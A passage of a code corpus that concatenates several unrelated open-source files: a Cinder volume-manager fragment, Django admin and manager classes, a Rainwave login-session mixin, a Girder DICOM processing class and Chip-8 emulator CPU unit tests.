    one that does the failover of the volumes and another that finalizes
    the failover of the services themselves.

    This method takes care of the last part and is called from the
    service doing the failover of the volumes after it has finished
    processing the volumes.
    """
    backend_host = vol_utils.extract_host(self.host, 'backend')
    svc = objects.Service.get_by_args(context, backend_host,
                                      constants.VOLUME_BINARY)
    svc.update(updates)
    try:
        self.driver.failover_completed(context, svc.active_backend_id)
    except Exception:
        msg = _('Driver reported error during replication failover '
                'completion.')
        LOG.exception(msg)
        # Driver refused/failed the finalization: disable the service
        # and flag replication as broken, but still persist the record.
        svc.disabled = True
        svc.disabled_reason = msg
        svc.replication_status = (
            fields.ReplicationStatus.ERROR)
    svc.save()
def freeze_host(self, context):
    """Freeze management plane on this backend.

    Basically puts the control/management plane into a
    Read Only state. We should handle this in the scheduler,
    however this is provided to let the driver know in case it
    needs/wants to do something specific on the backend.

    :param context: security context
    :returns: True (the service is disabled regardless of driver outcome)
    """
    # TODO(jdg): Return from driver? or catch?
    # The freeze succeeds even if the driver notification fails: we
    # don't need the backend's consent to disable the service, so a
    # driver error is only worth a warning here.
    try:
        self.driver.freeze_backend(context)
    except exception.VolumeDriverException:
        LOG.warning(_LW('Error encountered on Cinder backend during '
                        'freeze operation, service is frozen, however '
                        'notification to driver has failed.'))
    backend_host = vol_utils.extract_host(self.host, 'backend')
    svc = objects.Service.get_by_args(
        context,
        backend_host,
        constants.VOLUME_BINARY)
    svc.disabled = True
    svc.disabled_reason = "frozen"
    svc.save()
    LOG.info(_LI("Set backend status to frozen successfully."))
    return True
def thaw_host(self, context):
    """UnFreeze management plane on this backend.

    Basically puts the control/management plane back into
    a normal state. We should handle this in the scheduler,
    however this is provided to let the driver know in case it
    needs/wants to do something specific on the backend.

    :param context: security context
    :returns: True on success, False if the driver refused the thaw
    """
    # TODO(jdg): Return from driver? or catch?
    # Unlike freeze, the driver's answer matters here: if the backend
    # cannot be thawed we must leave the service disabled.
    try:
        self.driver.thaw_backend(context)
    except exception.VolumeDriverException:
        LOG.error(_LE('Error encountered on Cinder backend during '
                      'thaw operation, service will remain frozen.'))
        return False
    backend_host = vol_utils.extract_host(self.host, 'backend')
    svc = objects.Service.get_by_args(
        context,
        backend_host,
        constants.VOLUME_BINARY)
    svc.disabled = False
    svc.disabled_reason = ""
    svc.save()
    LOG.info(_LI("Thawed backend successfully."))
    return True
def manage_existing_snapshot(self, ctxt, snapshot, ref=None):
    """Bring an existing backend snapshot under Cinder management.

    Builds and runs the manage_existing_snapshot taskflow for the given
    snapshot/reference pair.

    :returns: the snapshot id on success
    :raises: exception.CinderException if the flow cannot be created
    """
    LOG.debug('manage_existing_snapshot: managing %s.', ref)
    try:
        # 'manage_existing_snapshot' below resolves to the module-level
        # taskflow module, not to this method.
        flow_engine = manage_existing_snapshot.get_flow(
            ctxt,
            self.db,
            self.driver,
            self.host,
            snapshot.id,
            ref)
    except Exception:
        LOG.exception(_LE("Failed to create manage_existing flow: "
                          "%(object_type)s %(object_id)s."),
                      {'object_type': 'snapshot',
                       'object_id': snapshot.id})
        raise exception.CinderException(
            _("Failed to create manage existing flow."))
    with flow_utils.DynamicLogListener(flow_engine, logger=LOG):
        flow_engine.run()
    return snapshot.id
def get_manageable_snapshots(self, ctxt, marker, limit, offset,
                             sort_keys, sort_dirs, want_objects=False):
    """List backend snapshots that could be managed by Cinder.

    Asks the driver for its manageable snapshots, passing the snapshots
    Cinder already knows about so the driver can mark them; optionally
    converts the result to a ManageableSnapshotList object.
    """
    try:
        utils.require_driver_initialized(self.driver)
    except exception.DriverNotInitialized:
        with excutils.save_and_reraise_exception():
            LOG.exception(_LE("Listing manageable snapshots failed, due "
                              "to uninitialized driver."))
    known_snapshots = self._get_my_snapshots(ctxt)
    try:
        entries = self.driver.get_manageable_snapshots(
            known_snapshots, marker, limit, offset, sort_keys, sort_dirs)
        if want_objects:
            entries = (objects.ManageableSnapshotList.
                       from_primitives(ctxt, entries))
    except Exception:
        with excutils.save_and_reraise_exception():
            LOG.exception(_LE("Listing manageable snapshots failed, due "
                              "to driver error."))
    return entries
def get_capabilities(self, context, discover):
    """Get capabilities of backend storage.

    :param discover: when true, ask the driver to (re)initialize its
                     capabilities before reading them.
    """
    if discover:
        self.driver.init_capabilities()
    caps = self.driver.capabilities
    LOG.debug("Obtained capabilities list: %s.", caps)
    return caps
def get_backup_device(self, ctxt, backup, want_objects=False):
    """Resolve the device (volume or snapshot) to back up from.

    Returns a dict with the device, whether it is a snapshot, and
    whether the driver uses secure file operations; optionally wrapped
    in a BackupDeviceInfo object.
    """
    backup_device, is_snapshot = self.driver.get_backup_device(ctxt,
                                                               backup)
    secure_enabled = self.driver.secure_file_operations_enabled()
    device_info = {'backup_device': backup_device,
                   'secure_enabled': secure_enabled,
                   'is_snapshot': is_snapshot, }
    # TODO(sborkows): from_primitive method will be removed in O, so there
    # is a need to clean here then.
    if want_objects:
        return objects.BackupDeviceInfo.from_primitive(device_info, ctxt)
    return device_info
def secure_file_operations_enabled(self, ctxt, volume):
    """Report whether the driver performs secure file operations.

    The ctxt and volume arguments are accepted for RPC signature
    compatibility; the driver is queried without them.
    """
    return self.driver.secure_file_operations_enabled()
def _connection_create(self, ctxt, volume, attachment, connector):
    """Validate the connector, export the volume, and build connection info.

    Runs the four attach-side steps in order -- validate_connector,
    create_export, persist any model update, initialize_connection --
    mapping each failure to a distinct exception, then flattens the
    driver's connection info and records the 'attaching' state plus the
    connector specs in the DB.

    :returns: flattened connection_info dict including 'attachment_id'
    """
    try:
        self.driver.validate_connector(connector)
    except exception.InvalidConnectorException as err:
        raise exception.InvalidInput(reason=six.text_type(err))
    except Exception as err:
        err_msg = (_("Validate volume connection failed "
                     "(error: %(err)s).") % {'err': six.text_type(err)})
        LOG.error(err_msg, resource=volume)
        raise exception.VolumeBackendAPIException(data=err_msg)
    try:
        model_update = self.driver.create_export(ctxt.elevated(),
                                                 volume, connector)
    except exception.CinderException as ex:
        err_msg = (_("Create export for volume failed (%s).") % ex.msg)
        LOG.exception(err_msg, resource=volume)
        raise exception.VolumeBackendAPIException(data=err_msg)
    try:
        if model_update:
            volume.update(model_update)
            volume.save()
    except exception.CinderException as ex:
        LOG.exception(_LE("Model update failed."), resource=volume)
        raise exception.ExportFailure(reason=six.text_type(ex))
    try:
        conn_info = self.driver.initialize_connection(volume, connector)
    except Exception as err:
        err_msg = (_("Driver initialize connection failed "
                     "(error: %(err)s).") % {'err': six.text_type(err)})
        LOG.exception(err_msg, resource=volume)
        # Connection setup failed: tear down the export created above.
        self.driver.remove_export(ctxt.elevated(), volume)
        raise exception.VolumeBackendAPIException(data=err_msg)
    conn_info = self._parse_connection_options(ctxt, volume, conn_info)
    # NOTE(jdg): Get rid of the nested dict (data key)
    conn_data = conn_info.pop('data', {})
    connection_info = conn_data.copy()
    connection_info.update(conn_info)
    values = {'volume_id': volume.id,
              'attach_status': 'attaching', }
    self.db.volume_attachment_update(ctxt, attachment.id, values)
    self.db.attachment_specs_update_or_create(
        ctxt,
        attachment.id,
        connector)
    connection_info['attachment_id'] = attachment.id
    return connection_info
def attachment_update(self,
                      context,
                      vref,
                      connector,
                      attachment_id):
    """Update/Finalize an attachment.

    This call updates a valid attachment record to associate with a volume
    and provide the caller with the proper connection info. Note that
    this call requires an `attachment_ref`. It's expected that prior to
    this call that the volume and an attachment UUID has been reserved.

    param: vref: Volume object to create attachment for
    param: connector: Connector object to use for attachment creation
    param: attachment_ref: ID of the attachment record to update

    :raises: exception.InvalidVolumeAttachMode if a read-only volume is
             attached with a non-'ro' mode.
    """
    mode = connector.get('mode', 'rw')
    self._notify_about_volume_usage(context, vref, 'attach.start')
    attachment_ref = objects.VolumeAttachment.get_by_id(context,
                                                        attachment_id)
    connection_info = self._connection_create(context,
                                              vref,
                                              attachment_ref,
                                              connector)
    # FIXME(jdg): get rid of this admin_meta option here, the only thing
    # it does is enforce that a volume is R/O, that should be done via a
    # type and not *more* metadata
    volume_metadata = self.db.volume_admin_metadata_update(
        context.elevated(),
        attachment_ref.volume_id,
        {'attached_mode': mode}, False)
    if volume_metadata.get('readonly') == 'True' and mode != 'ro':
        # Read-only volume attached read-write: mark the volume errored,
        # raise a user-visible message, and abort the attach.
        self.db.volume_update(context, vref.id,
                              {'status': 'error_attaching'})
        self.message_api.create(
            context, defined_messages.ATTACH_READONLY_VOLUME,
            context.project_id, resource_type=resource_types.VOLUME,
            resource_uuid=vref.id)
        raise exception.InvalidVolumeAttachMode(mode=mode,
                                                volume_id=vref.id)
    try:
        utils.require_driver_initialized(self.driver)
        self.driver.attach_volume(context,
                                  vref,
                                  attachment_ref.instance_uuid,
                                  connector.get('hostname', ''),
                                  connector.get('mountpoint', 'na'))
    except Exception:
        with excutils.save_and_reraise_exception():
            self.db.volume_attachment_update(
                context, attachment_ref.id,
                {'attach_status': 'error_attaching'})
    self.db.volume_attached(context.elevated(),
                            attachment_ref.id,
                            attachment_ref.instance_uuid,
                            connector.get('hostname', ''),
                            connector.get('mountpoint', 'na'),
                            mode)
    vref.refresh()
    self._notify_about_volume_usage(context, vref, "attach.end")
    LOG.info(_LI("Attach volume completed successfully."),
             resource=vref)
    # Re-read the attachment record after the DB updates above.
    attachment_ref = objects.VolumeAttachment.get_by_id(context,
                                                        attachment_id)
    return connection_info
def _connection_terminate(self, context, volume,
                          attachment, force=False):
    """Remove a volume connection, but leave attachment.

    Looks up the connector that was stored for the attachment and asks
    the driver to terminate the connection with it. Non-boolean driver
    return values are normalized to False.
    """
    utils.require_driver_initialized(self.driver)
    # TODO(jdg): Add an object method to cover this
    connector = self.db.attachment_specs_get(
        context,
        attachment.id)
    try:
        shared_connections = self.driver.terminate_connection(volume,
                                                              connector,
                                                              force=force)
        # Normalize: drivers may return something other than a bool.
        if not isinstance(shared_connections, bool):
            shared_connections = False
    except Exception as err:
        err_msg = (_('Terminate volume connection failed: %(err)s')
                   % {'err': six.text_type(err)})
        LOG.exception(err_msg, resource=volume)
        raise exception.VolumeBackendAPIException(data=err_msg)
    LOG.info(_LI("Terminate volume connection completed successfully."),
             resource=volume)
    # NOTE(jdg): Return True/False if there are other outstanding
    # attachments that share this connection. If True should signify
    # caller to preserve the actual host connection (work should be
    # done in the brick connector as it has the knowledge of what's
    # going on here.
    return shared_connections
def attachment_delete(self, context, attachment_id, vref):
    """Delete/Detach the specified attachment.

    Notifies the backend device that we're detaching the specified
    attachment instance. If the attachment record cannot be found, all
    existing attachments for the volume are removed instead.

    param: vref: Volume object associated with the attachment
    param: attachment: Attachment reference object to remove
    :returns: whether a shared host connection remains in use
    """
    attachment_ref = objects.VolumeAttachment.get_by_id(context,
                                                        attachment_id)
    if attachment_ref:
        return self._do_attachment_delete(context, vref, attachment_ref)
    # No such record: detach everything on the volume, remembering
    # whether any of them still shared a host connection.
    shared = False
    for att in VA_LIST.get_all_by_volume_id(context, vref.id):
        if self._do_attachment_delete(context, vref, att):
            shared = True
    return shared
def _do_attachment_delete(self, context, vref, attachment):
    """Terminate the connection and detach a single attachment.

    On driver failure the attachment is marked 'error_detaching';
    on success the DB rows are updated to the detached state.

    :returns: the shared-connection flag from _connection_terminate so
              callers know whether other attachments still use the
              underlying host connection.
    """
    utils.require_driver_initialized(self.driver)
    self._notify_about_volume_usage(context, vref, "detach.start")
    has_shared_connection = self._connection_terminate(context,
                                                       vref,
                                                       attachment)
    # BUG FIX: detach_volume was previously also called unconditionally
    # here, before the try block -- detaching twice and bypassing the
    # error handling below. The single guarded call is the correct path.
    try:
        LOG.debug('Deleting attachment %(attachment_id)s.',
                  {'attachment_id': attachment.id},
                  resource=vref)
        self.driver.detach_volume(context, vref, attachment)
        self.driver.remove_export(context.elevated(), vref)
    except Exception:
        # FIXME(jdg): Obviously our volume object is going to need some
        # changes to deal with multi-attach and figuring out how to
        # represent a single failed attach out of multiple attachments
        # TODO(jdg): object method here
        self.db.volume_attachment_update(
            context, attachment.get('id'),
            {'attach_status': 'error_detaching'})
    else:
        self.db.volume_detached(context.elevated(), vref.id,
                                attachment.get('id'))
        self.db.volume_admin_metadata_delete(context.elevated(),
                                             vref.id,
                                             'attached_mode')
    self._notify_about_volume_usage(context, vref, "detach.end")
    return has_shared_connection
def is_volume_trusted(self, ctxt, volume_id):
    """Check a volume's host against the asset-tag trust filter.

    Scans the volume's metadata: a 'trust' key triggers verification of
    the volume's backend host, and 'asset_tags' supplies the tags to
    check (defaulting to the string 'None').

    :returns: the trust filter's verdict, or None when the volume does
              not carry a 'trust' metadata key.
    """
    vol = self.db.api.volume_get(ctxt, volume_id)
    needs_check = False
    tags = 'None'
    backend_host = ''
    for entry in vol.volume_metadata:
        if entry.key == 'trust':
            backend_host = vol.host.split("@")[0]
            needs_check = True
        elif entry.key == 'asset_tags':
            tags = entry.value
    if not needs_check:
        return None
    return self.asset_tag_filter.is_trusted(backend_host, tags)
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import (
UserCreationForm,
UserChangeForm,
)
from django.forms import forms
from django.contrib import admin
from kirppu.kirppuauth.models import User
__author__ = 'codez'
class KirppuUserCreationForm(UserCreationForm):
    """User-creation form bound to the project's custom User model."""

    class Meta(UserCreationForm.Meta):
        model = User

    def clean_username(self):
        """Reject usernames that are already taken (EAFP lookup)."""
        wanted = self.cleaned_data['username']
        try:
            User.objects.get(username=wanted)
        except User.DoesNotExist:
            # No clash -- the username is free.
            return wanted
        # get() succeeded, so the name is already in use.
        raise forms.ValidationError(
            self.error_messages['duplicate_username']
        )
class KirppuUserChangeForm(UserChangeForm):
    """Admin change form re-pointed at the project's custom User model."""
    class Meta(UserChangeForm.Meta):
        model = User
class KirppuUserAdmin(UserAdmin):
    """UserAdmin variant wired to the project's custom user forms."""
    form = KirppuUserChangeForm
    add_form = KirppuUserCreationForm


# Expose the custom User model in the Django admin using the forms above.
admin.site.register(User, KirppuUserAdmin)
| mniemela/kirppu | kirppu/kirppuauth/admin.py | Python | mit | 929 |
from bluebottle.bluebottle_utils.managers import GenericForeignKeyManagerMixin
from django.db import models
from polymorphic import PolymorphicManager
class WallPostManager(GenericForeignKeyManagerMixin, PolymorphicManager):
    """Polymorphic manager with generic-FK helpers; adds no behavior."""
    pass
class ReactionManager(models.Manager):
    """Default manager that hides soft-deleted reactions."""

    def get_query_set(self):
        """Return only reactions whose ``deleted`` timestamp is unset."""
        base = super(ReactionManager, self).get_query_set()
        return base.filter(deleted__isnull=True)
| gannetson/sportschooldeopenlucht | apps/wallposts/managers.py | Python | bsd-3-clause | 423 |
import uuid
from libs import db
from rainwave.user import User
# Login destinations a client may request; anything else falls back to "web".
ALLOWED_DESTINATIONS = ("web", "rw", "app", "rwpath")
class R4SetupSessionMixin:
    """Handler mixin that creates Rainwave sessions and redirects clients."""

    def get_destination(self):
        """Return the requested 'destination' argument, defaulting to 'web'.

        Unknown values are coerced to 'web' as well.
        """
        destination = self.get_argument("destination", "web")
        if destination not in ALLOWED_DESTINATIONS:
            destination = "web"
        return destination

    def setup_rainwave_session_and_redirect(self, user_id, destination):
        """Create a session row and cookie, then redirect per destination.

        A fresh UUID session is stored in r4_sessions and set as a
        year-long cookie. For 'app'/'rw' and 'rwpath' destinations the
        user is authorized and sent to a scheme-specific URL embedding
        their id and API key; otherwise they go to the site root.
        """
        session_id = str(uuid.uuid4())
        db.c.update(
            "INSERT INTO r4_sessions (session_id, user_id) VALUES (%s, %s)",
            (session_id, user_id,)
        )
        self.set_cookie("r4_session_id", session_id, expires_days=365)
        if destination == "app" or destination == "rw":
            user = User(user_id)
            user.authorize(1, None, bypass=True)
            self.redirect("rw://%s:%s@rainwave.cc" % (user.id, user.ensure_api_key()),)
        elif destination == "rwpath":
            user = User(user_id)
            user.authorize(1, None, bypass=True)
            self.redirect("rwpath://rainwave.cc/%s/%s" % (user.id, user.ensure_api_key()),)
        else:
            self.redirect("/")
| rmcauley/rainwave | api_requests/auth/r4_mixin.py | Python | gpl-2.0 | 1,057 |
../../../../../share/pyshared/zope/interface/adapter.py | Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/python2.7/dist-packages/zope/interface/adapter.py | Python | gpl-3.0 | 55 |
"""Includes GirderDicomProcessor class.
GirderDicomProcessor class authenticates with girder instance and
processes dicom images.
Dicom files are downloaded from girder and the pixel data is extracted.
Can processes either a folder of dicom images or a single volumetric
dicom image file.
"""
import dicom
import girder_client
from io import BytesIO
import numpy as np
import os
class GirderProcessor:
def __init__(self, api_url, username, password,
folder_path=None):
"""Authenticate with girder instance then process dicom images.
:param api_url: The API URL of the girder server
:param username: The username of the girder user
:param password: The password of the girder user
:param folder_path: the unix style path to the folder containing each
individual dicom image file on girder
(default None)
:param file_path: the unix style path to the 3d dicom volumetric scan
(default None)
"""
self._client = girder_client.GirderClient(apiUrl=api_url)
self._client.authenticate(username, password)
if folder_path:
self.folder_path = folder_path
self._images = []
self._processed = False
def get_items_folders(self, folderId):
return {i['name']:i["_id"] for i in self._client.listItem(folderId)},\
{f['name']:f["_id"] for f in self._client.listFolder(folderId)}
def query_folder(self, folder_path):
"""Download and extract pixel data from images located in folder.
Scan through the file at the already given folder path and store pixel
information for each dicom image. Processed images can be accessed via
get_image method.
"""
folder = self._client.resourceLookup(folder_path)
return self.get_items_folders(folder['_id'])
def read_dicom(self, dfile, verbose=False):
"""
"""
fileId = dfile['_id']
# create file like opbject and download file to it
output = BytesIO()
if verbose:
print("Downloading file...", fileId)
self._client.downloadFile(fileId, output)
if verbose:
print("Download complete.")
# seek file position back to the front
output.seek(0)
# read file as dicom image
return dicom.read_file(output)
def get_dicom_item_series_files(self, itemID):
"""
Download and extract pixel data from dicom image file.
Scan through the file at the already given file path and store pixel
information for each dicom image slice. Processed images can be
accessed via get_image method.
"""
dfiles = [f for f in self._client.listFile(itemID) if f['mimeType'] == 'application/dicom']
return dfiles
return [self.read_dicom(dfile) for dfile in dfiles]
def get_dicom_folder_series_files(self, itemID):
"""
Download and extract pixel data from dicom image file.
Scan through the file at the already given file path and store pixel
information for each dicom image slice. Processed images can be
accessed via get_image method.
"""
dfiles = [f for f in self._client.listFile(itemID) if f['mimeType'] == 'application/dicom']
return dfiles
return [self.read_dicom(dfile) for dfile in dfiles]
def get_dicom_series(self, itemID):
"""
Download and extract pixel data from dicom image file.
Scan through the file at the already given file path and store pixel
information for each dicom image slice. Processed images can be
accessed via get_image method.
"""
dfiles = self.get_dicom_item_series_files(itemID)
return [self.read_dicom(dfile) for dfile in dfiles]
    def get_case_dates(self, caseID):
        """Return the date folders of a case.

        NOTE(review): assumes get_items_folders returns a 2-tuple of
        name -> id mappings with folders in the second slot -- confirm
        against its definition (not visible in this chunk).
        """
        _, dates = self.get_items_folders(caseID)
        return dates
    def get_date_exams(self, dateID):
        """Return the exam folders of a date folder.

        NOTE(review): assumes get_items_folders returns a 2-tuple of
        name -> id mappings with folders in the second slot -- confirm
        against its definition (not visible in this chunk).
        """
        _, exams = self.get_items_folders(dateID)
        return exams
    def get_exam_series(self, examID):
        """Return the series of an exam folder.

        NOTE(review): unlike get_case_dates/get_date_exams, this takes the
        FIRST slot of get_items_folders (the items) -- confirm that series
        are stored as items, not subfolders.
        """
        series, _ = self.get_items_folders(examID)
        return series
def get_case_series(self, caseID):
case_series = {}
for d, did in self.get_case_dates(caseID).items():
for e, eid in self.get_date_exams(did).items():
for s, sid in self.get_exam_series(eid).items():
case_series[os.path.join(d,e,s)] = sid
return case_series
def find_matching_item_by_name(self, current_case, name_to_match):
"""
Searches the content of a directory (case) and returns the first item in
the folder matching provided pattern
Arguments:
current_case: girder ID for case/folder
name_to_match: a string containing the pattern to match in the item names
If match is successful, function returns the matched item dictionary.
Else None is returned
"""
current_items = self.get_case_series(current_case)
for key in current_items.keys():
if name_to_match in key:
return current_items[key]
else:
return None
    def get_item_fileID(self, itemID, fnum=0, mimeType='application/json'):
        """
        Returns the fileID for the fnum-th file of matching mimeType for an itemID

        Arguments:
            itemID: Girder item whose files are listed.
            fnum: index into the list of matching files (default: first).
            mimeType: MIME type to filter on (default 'application/json').

        Raises IndexError when fewer than fnum+1 files match.
        """
        return [f['_id'] for f in self._client.listFile(itemID) if f["mimeType"]==mimeType][fnum]
def get_vol_image_from_stack(dd):
dd.sort(key=lambda x: int(x.InstanceNumber))
vol = np.dstack([d.pixel_array for d in dd]).transpose()
meta = {"PixelSpacingX":float(dd[0].data_element("PixelSpacing").value[0]),
"PixelSpacingY":float(dd[0].data_element("PixelSpacing").value[1]),
"SliceThickness":float(dd[0].data_element("SliceThickness").value)}
return vol, meta
| chapmanbe/pymitools | pymitools/girder/girderProcessor.py | Python | apache-2.0 | 5,991 |
"""
Copyright (C) 2012-2018 Craig Thomas
This project uses an MIT style license - see LICENSE for details.
A simple Chip 8 emulator - see the README file for more information.
"""
# I M P O R T S ###############################################################
import mock
import pygame
import unittest
import collections
from mock import patch, call
from chip8.cpu import Chip8CPU, UnknownOpCodeException, MODE_EXTENDED
from chip8.screen import Chip8Screen
# C O N S T A N T S ###########################################################
KEYPRESS_TABLE = [0] * 512
# C L A S S E S ###############################################################
class TestChip8CPU(unittest.TestCase):
"""
A test class for the Chip 8 CPU.
"""
def setUp(self):
"""
Common setup routines needed for all unit tests.
"""
self.screen = mock.MagicMock()
self.cpu = Chip8CPU(self.screen)
self.cpu_spy = mock.Mock(wraps=self.cpu)
def test_return_from_subroutine(self):
for address in range(0x200, 0xFFFF, 0x10):
self.cpu.memory[self.cpu.registers['sp']] = address & 0x00FF
self.cpu.memory[self.cpu.registers['sp'] + 1] = \
(address & 0xFF00) >> 8
self.cpu.registers['sp'] += 2
self.cpu.registers['pc'] = 0
self.cpu.return_from_subroutine()
self.assertEqual(self.cpu.registers['pc'], address)
def test_jump_to_address(self):
for address in range(0, 0xFFFF, 0x10):
self.cpu.operand = address
self.cpu.registers['pc'] = 0
self.assertEqual(self.cpu.registers['pc'], 0)
self.cpu.jump_to_address()
self.assertEqual(self.cpu.registers['pc'], (address & 0x0FFF))
def test_jump_to_subroutine(self):
for address in range(0x200, 0xFFFF, 0x10):
self.cpu.operand = address
self.cpu.registers['sp'] = 0
self.cpu.registers['pc'] = 0x100
self.cpu.jump_to_subroutine()
self.assertEqual(self.cpu.registers['pc'], (address & 0x0FFF))
self.assertEqual(self.cpu.registers['sp'], 2)
self.assertEqual(self.cpu.memory[0], 0)
self.assertEqual(self.cpu.memory[1], 0x1)
def test_skip_if_reg_equal_value(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
for reg_value in range(0, 0xFF, 0x10):
self.cpu.operand = register << 8
self.cpu.operand += value
self.cpu.registers['v'][register] = reg_value
self.cpu.registers['pc'] = 0
self.assertEqual(self.cpu.registers['pc'], 0)
self.cpu.skip_if_reg_equal_val()
if value == reg_value:
self.assertEqual(self.cpu.registers['pc'], 2)
else:
self.assertEqual(self.cpu.registers['pc'], 0)
def test_skip_if_reg_not_equal_val(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
for reg_value in range(0, 0xFF, 0x10):
self.cpu.operand = register << 8
self.cpu.operand += value
self.cpu.registers['v'][register] = reg_value
self.cpu.registers['pc'] = 0
self.cpu.skip_if_reg_not_equal_val()
if value != reg_value:
self.assertEqual(self.cpu.registers['pc'], 2)
else:
self.assertEqual(self.cpu.registers['pc'], 0)
def test_skip_if_reg_equal_reg(self):
for reg_num in range(0x10):
self.cpu.registers['v'][reg_num] = reg_num
for reg_1 in range(0x10):
for reg_2 in range(0x10):
self.cpu.operand = reg_1
self.cpu.operand <<= 4
self.cpu.operand += reg_2
self.cpu.operand <<= 4
self.cpu.registers['pc'] = 0
self.assertEqual(self.cpu.registers['pc'], 0)
self.cpu.skip_if_reg_equal_reg()
# If we are testing the same register as the source and the
# destination, then a skip WILL occur
if reg_1 == reg_2:
self.assertEqual(self.cpu.registers['pc'], 2)
else:
self.assertEqual(self.cpu.registers['pc'], 0)
def test_move_value_to_reg(self):
val = 0x23
for reg_num in range(0x10):
self.assertEqual(self.cpu.registers['v'][0x0], 0)
for reg_num in range(0x10):
self.cpu.operand = 0x60 + reg_num
self.cpu.operand <<= 8
self.cpu.operand += val
self.cpu.move_value_to_reg()
for reg_to_check in range(0x10):
if reg_to_check != reg_num:
self.assertEqual(self.cpu.registers['v'][reg_to_check], 0)
else:
self.assertEqual(self.cpu.registers['v'][reg_to_check], val)
self.cpu.registers['v'][reg_num] = 0
def test_add_value_to_reg(self):
for register in range(0x10):
for reg_value in range(0, 0xFF, 0x10):
for value in range(0, 0xFF, 0x10):
self.cpu.registers['v'][register] = reg_value
self.cpu.operand = register << 8
self.cpu.operand += value
self.assertEqual(
self.cpu.registers['v'][register],
reg_value)
self.cpu.add_value_to_reg()
if value + reg_value < 256:
self.assertEqual(
self.cpu.registers['v'][register],
value + reg_value)
else:
self.assertEqual(
self.cpu.registers['v'][register],
(value + reg_value - 256))
def test_move_reg_into_reg(self):
for source in range(0x10):
for target in range(0x10):
if source != target:
self.cpu.registers['v'][target] = 0x32
self.cpu.registers['v'][source] = 0
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.move_reg_into_reg()
self.assertEqual(self.cpu.registers['v'][source], 0x32)
def test_logical_or(self):
for source in range(0x10):
for target in range(0x10):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0, 0xFF, 0x10):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.logical_or()
self.assertEqual(
self.cpu.registers['v'][source],
source_val | target_val)
else:
for source_val in range(0, 0xFF, 0x10):
self.cpu.registers['v'][source] = source_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.logical_or()
self.assertEqual(
self.cpu.registers['v'][source],
source_val)
def test_logical_and(self):
for source in range(0x10):
for target in range(0x10):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0, 0xFF, 0x10):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.logical_and()
self.assertEqual(
self.cpu.registers['v'][source],
source_val & target_val)
else:
for source_val in range(256):
self.cpu.registers['v'][source] = source_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.logical_and()
self.assertEqual(
self.cpu.registers['v'][source],
source_val)
def test_exclusive_or(self):
for source in range(0x10):
for target in range(0x10):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0xF):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.exclusive_or()
self.assertEqual(
self.cpu.registers['v'][source],
source_val ^ target_val)
def test_add_to_reg(self):
for source in range(0xF):
for target in range(0xF):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0, 0xFF, 0x10):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.add_reg_to_reg()
if source_val + target_val > 255:
self.assertEqual(
self.cpu.registers['v'][source],
source_val + target_val - 256)
self.assertEqual(
self.cpu.registers['v'][0xF], 1)
else:
self.assertEqual(
self.cpu.registers['v'][source],
source_val + target_val)
self.assertEqual(
self.cpu.registers['v'][0xF], 0)
def test_subtract_reg_from_reg(self):
for source in range(0xF):
for target in range(0xF):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0xF):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.subtract_reg_from_reg()
if source_val > target_val:
self.assertEqual(
self.cpu.registers['v'][source],
source_val - target_val)
self.assertEqual(
self.cpu.registers['v'][0xF], 1)
else:
self.assertEqual(
self.cpu.registers['v'][source],
256 + source_val - target_val)
self.assertEqual(
self.cpu.registers['v'][0xF], 0)
def test_right_shift_reg(self):
for register in range(0xF):
for value in range(0, 0xFF, 0x10):
self.cpu.registers['v'][register] = value
self.cpu.operand = register << 8
self.cpu.operand = self.cpu.operand + (register << 4)
for index in range(1, 8):
shifted_val = value >> index
self.cpu.registers['v'][0xF] = 0
bit_zero = self.cpu.registers['v'][register] & 0x1
self.cpu.right_shift_reg()
self.assertEqual(
self.cpu.registers['v'][register], shifted_val)
self.assertEqual(self.cpu.registers['v'][0xF], bit_zero)
def test_subtract_reg_from_reg1(self):
for source in range(0xF):
for target in range(0xF):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0xF):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.subtract_reg_from_reg1()
if target_val > source_val:
self.assertEqual(
self.cpu.registers['v'][source],
target_val - source_val)
self.assertEqual(
self.cpu.registers['v'][0xF], 1)
else:
self.assertEqual(
self.cpu.registers['v'][source],
256 + target_val - source_val)
self.assertEqual(
self.cpu.registers['v'][0xF], 0)
    def test_left_shift_reg(self):
        # NOTE(review): bit_seven is computed as (shifted_val & 0x100) >> 9,
        # which is always 0 (the single bit at 0x100 vanishes after a
        # 9-place shift); extracting the carried-out bit would be >> 8.
        # The final assertion therefore only ever checks VF == 0 -- confirm
        # against the CPU's left_shift_reg semantics before changing.
        for register in range(0xF):
            for value in range(256):
                self.cpu.registers['v'][register] = value
                self.cpu.operand = register << 8
                self.cpu.operand = self.cpu.operand + (register << 4)
                for index in range(1, 8):
                    shifted_val = value << index
                    bit_seven = (shifted_val & 0x100) >> 9
                    shifted_val = shifted_val & 0xFFFF
                    self.cpu.registers['v'][0xF] = 0
                    self.cpu.left_shift_reg()
                    self.assertEqual(
                        self.cpu.registers['v'][register],
                        shifted_val)
